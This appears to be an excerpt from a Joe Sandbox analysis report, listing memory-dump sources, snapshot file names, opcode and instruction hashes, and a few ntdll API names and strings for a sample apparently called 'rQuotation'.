                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7CE09231010A12DFEB326F2ECC0CB56BAE1BF50711F188C2CA196024B0C77698C0CA44
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                                                                                                                                                                                                • Instruction ID: c102499d9935c66ca0ee0f9acbee384f1e7bcba59c76e52b5b833e12587824ae
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 86E0C2343003058FE715CF19C040B62BBB6BFD5A10F28C0A8A9498F205EB33E852DB40
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                                                                                                                                                                                                • Instruction ID: f21e944238cfeaa3c2a73c5090543040339098b34b9cf55e70bafe6f96be6b73
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A9E08632400A11DED7322F16DC48F91B6A9FB94B10F148819E141070A987745CC2CB84
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 477293ffd16b51b7acda38ab7ecac8e499aa03bd7d84e7966d3b5003ec0dd3ab
                                                                                                                                                                                                                                                • Instruction ID: 24e6421ac0aa608ebc95c4a33139df180afe5a45ed171e8c903440a0c2435f38
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 477293ffd16b51b7acda38ab7ecac8e499aa03bd7d84e7966d3b5003ec0dd3ab
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 11E08C721005606BC211FB5EDD60F9A739AEBA4660F004129F15187290CA20AC00C798
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                                                                                                                                                                                                                                • Instruction ID: 1e73c2f9396173856bbd1f462de8632d2f923179a36d133655326f7a4da29f90
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: ABD05E36511A50AFC3329F1BEE00C13FBF9FBC4A10705062EA54583A24C670A806CBA0
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                                                                                                                                                                                                • Instruction ID: a4a44c18c0adcdf18a43837285302fb6cada53e06b9f8bea23dac9abc4001a71
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 51D0A932608A20ABD732AA1CFC00FC373E9BB88720F060459B008C7151C3A0AC81CA88
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                                                                                                                                                                                                                • Instruction ID: 78ae98b308e6db7ee97081fc577f786cf5770508e4f38114dc57647fe49f5a57
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CEE0EC759506889BDF12DF59CA44F5ABBB9FB94B40F150058A1085B661C625A900CB40
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                                                                                                                                                                                                • Instruction ID: 894c5525e4da3743f5f0b1670fe03207355429fbbf351977d3dedb90a8986316
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6FD0223221207093CB2857956C40FA36A06EB80A94F0A002D340A93A00C1058C83C3E0
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                                                                                                                                                                                                                • Instruction ID: eaeed35dcce541284cc4ae709fdfea2019a826b3219117c236e4582d96246072
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 75D012771D054DBBCB119F66DC01F957BA9E764BA0F444020B504875A0C63AE950D584
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 931e68b656d8a664677af63aa451de7a27c7d42bd1a0d3b090eac779a795dfba
                                                                                                                                                                                                                                                • Instruction ID: 5a13344bc69c6afa4441c2197569579efaa02dd12f2c10e98737ef14dfd241fd
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 931e68b656d8a664677af63aa451de7a27c7d42bd1a0d3b090eac779a795dfba
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6E90023225540803D304715C4804686500597D1301F55C021A6024665ED7658A917232
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 9f03452e81b4f293cc7e43a584ebd27086e171dc9739bb3b9cf8849f3b8ffcea
                                                                                                                                                                                                                                                • Instruction ID: cd9156f57e55abe3ae0018342b867020ed3f01ede2a22ea4735787518e71a47d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9f03452e81b4f293cc7e43a584ebd27086e171dc9739bb3b9cf8849f3b8ffcea
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E9900226275400030345B55C060450B5445A7D7351395C025F14165A0CC7218A655322
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: ffa83c17bf96cdcd8caf7f62c7651b07128547e2ff23503e54f6fca278db4d60
                                                                                                                                                                                                                                                • Instruction ID: c7d58190b24ebb88390d059c1eb1c50c63ffa6bf811612284f03a48e73ae9161
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ffa83c17bf96cdcd8caf7f62c7651b07128547e2ff23503e54f6fca278db4d60
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D8900226265400030305B55C0704507504697D6351355C031F1015560CD7218A615222
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 427761116dcd137b425ba4cf6910d352515e2e5bfeeb1a8b3342d34502faf421
                                                                                                                                                                                                                                                • Instruction ID: 01992e5890e3dd1ba4497553b4a631f6d9eb937f5ee8d36ee766e975144f0b7d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 427761116dcd137b425ba4cf6910d352515e2e5bfeeb1a8b3342d34502faf421
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0A9002A2255540934700B25C8404B0A950597E1201B55C026E1054570CC6258A519236
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 52e162ce196de31e394ad03b25c8e6f429a6067b54396bd00c60acdbb0c09a61
                                                                                                                                                                                                                                                • Instruction ID: 0996331cff4675991108ba82868de8e3640faacd9cb9ebeb1d44caa28efabcc1
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 52e162ce196de31e394ad03b25c8e6f429a6067b54396bd00c60acdbb0c09a61
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3A90022235540003D340715C54186069005E7E2301F55D021E0414564CDA158A565323
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 50461956e34b5d64f3b1a0d4c3348e716fdea3174ce585bc0c0d7caa83276780
                                                                                                                                                                                                                                                • Instruction ID: 94ace7b92fda22909b40290ea09b5009d15e823add42de2bd9e20087974c7f7d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 50461956e34b5d64f3b1a0d4c3348e716fdea3174ce585bc0c0d7caa83276780
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2A90022A26740003D380715C540860A500597D2202F95D425A0015568CCA158A695322
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 1648914204bf579709e9beba09beca8409e8ff51012289e0fabf706888e01bbe
                                                                                                                                                                                                                                                • Instruction ID: 89455c92e0074b3c0f65d2f7dbba090b4cac79b67e87aa8e0397bba35a4f66b3
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1648914204bf579709e9beba09beca8409e8ff51012289e0fabf706888e01bbe
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0190022225944443D300755C5408A06500597D1205F55D021A10645A5DC7358A51A232
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 0387c95ea207988227339718d14c400a21196d5ce14f6c5012f08dccfa2190ae
                                                                                                                                                                                                                                                • Instruction ID: d2644afa34436a83b076bf7659654514a26c333e4c2413d859d3386774335516
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0387c95ea207988227339718d14c400a21196d5ce14f6c5012f08dccfa2190ae
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 83900222296441535745B15C44045079006A7E1241795C022A1414960CC6269A56D722
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 824fa98e0fdea079d36ffc6a8fb20ba6ba6940dfe0e13e21dec0d58b9df63abf
                                                                                                                                                                                                                                                • Instruction ID: 9b0219e1543dac00363f128e9d15521f4c23d67d3833b9f094a835df9d1dcafc
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 824fa98e0fdea079d36ffc6a8fb20ba6ba6940dfe0e13e21dec0d58b9df63abf
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D490023229540403D341715C44046065009A7D1241F95C022A0424564EC7558B56AB62
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 08fcc6c96870c8cd76dbaec2de142ec1af98ae2418995738c3ee95f0a43ff2c7
                                                                                                                                                                                                                                                • Instruction ID: f3631c2945548e386a015880297d9384a6d28bed747a3f4c7cfd5031a312b7f2
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 08fcc6c96870c8cd76dbaec2de142ec1af98ae2418995738c3ee95f0a43ff2c7
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0990023225580403D300715C481470B500597D1302F55C021A1164565DC7258A516672
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: edab521d3d38c7531174f8e188a193b3678d96b159a9c3466a6b60902dce0ed7
                                                                                                                                                                                                                                                • Instruction ID: a5aaa1b595a504da5d1c09bfa4b2686b69884dd24569b5432dcc2588e598e8ae
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: edab521d3d38c7531174f8e188a193b3678d96b159a9c3466a6b60902dce0ed7
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E290022235540403D302715C44146065009D7D2345F95C022E1424565DC7258B53A233
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: c703825325adb5301e8760ad39b5a481d262d67c40b44b2ba1836e86b9cd26a8
                                                                                                                                                                                                                                                • Instruction ID: 4dde3c8ae6eee957f82ea03c43f26b8a4bb481bf94b3cfd646905f6efa267eca
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c703825325adb5301e8760ad39b5a481d262d67c40b44b2ba1836e86b9cd26a8
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DD90026225580403D340755C4804607500597D1302F55C021A2064565ECB298E516236
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 8ee78f4230269b9d28fc7374dcdc055c8b5a895a66c072aa0c35f13112a7b038
                                                                                                                                                                                                                                                • Instruction ID: b9f25b53c3a406ba4dc3f81f3d4cd6468b7fe7525cad29fc3a0893b470309144
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8ee78f4230269b9d28fc7374dcdc055c8b5a895a66c072aa0c35f13112a7b038
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5490027225540403D340715C4404746500597D1301F55C021A5064564EC7598FD56766
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: ce70a7ff661a29ef1bb2029b0acfb67e10032779708aef15e5e5b9a702a2cc82
                                                                                                                                                                                                                                                • Instruction ID: 1decb71bc1bdf632251ba2c54fb82f22cb2f51c71c1dbb8add2893da12c69c7e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ce70a7ff661a29ef1bb2029b0acfb67e10032779708aef15e5e5b9a702a2cc82
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2790022265540503D301715C4404616500A97D1241F95C032A1024565ECB258B92A232
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 29d88e55ebb69ec4c7121e11636fed63db8265b8807df57559be973794285031
                                                                                                                                                                                                                                                • Instruction ID: 3771644ca4d7abc84292c305984b522a4aa9a53033cb61c6c6b125a4e4a1d5b1
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 29d88e55ebb69ec4c7121e11636fed63db8265b8807df57559be973794285031
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3690022225584443D340725C4804B0F910597E2202F95C029A4156564CCA158A555722
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 9eb36ddb6f916d02420e9d915c4c14a5d49c5f8725680935aba89f5e082b04f4
                                                                                                                                                                                                                                                • Instruction ID: 9d1edf20076fcb86d4e14e0e96317303b85e636904ba23e1a6ae49fde37cbdb4
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9eb36ddb6f916d02420e9d915c4c14a5d49c5f8725680935aba89f5e082b04f4
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A190022229540803D340715C84147075006D7D1601F55C021A0024564DC7168B6567B2
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 84be4aedb5789d572a0e82a56eff1b27484736fbe1df45213e168b79fbd008c0
                                                                                                                                                                                                                                                • Instruction ID: 0eb4e10249821cc755fa6163018101b034121de1f04a02fde2d773b2c0d44c52
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 84be4aedb5789d572a0e82a56eff1b27484736fbe1df45213e168b79fbd008c0
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3690022229945103D350715C44046169005B7E1201F55C031A08145A4DC6558A556322
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ___swprintf_l
                                                                                                                                                                                                                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                                                                                                                • API String ID: 48624451-2108815105
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ___swprintf_l
                                                                                                                                                                                                                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                                                                                                                • API String ID: 48624451-2108815105
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 017346FC
                                                                                                                                                                                                                                                • ExecuteOptions, xrefs: 017346A0
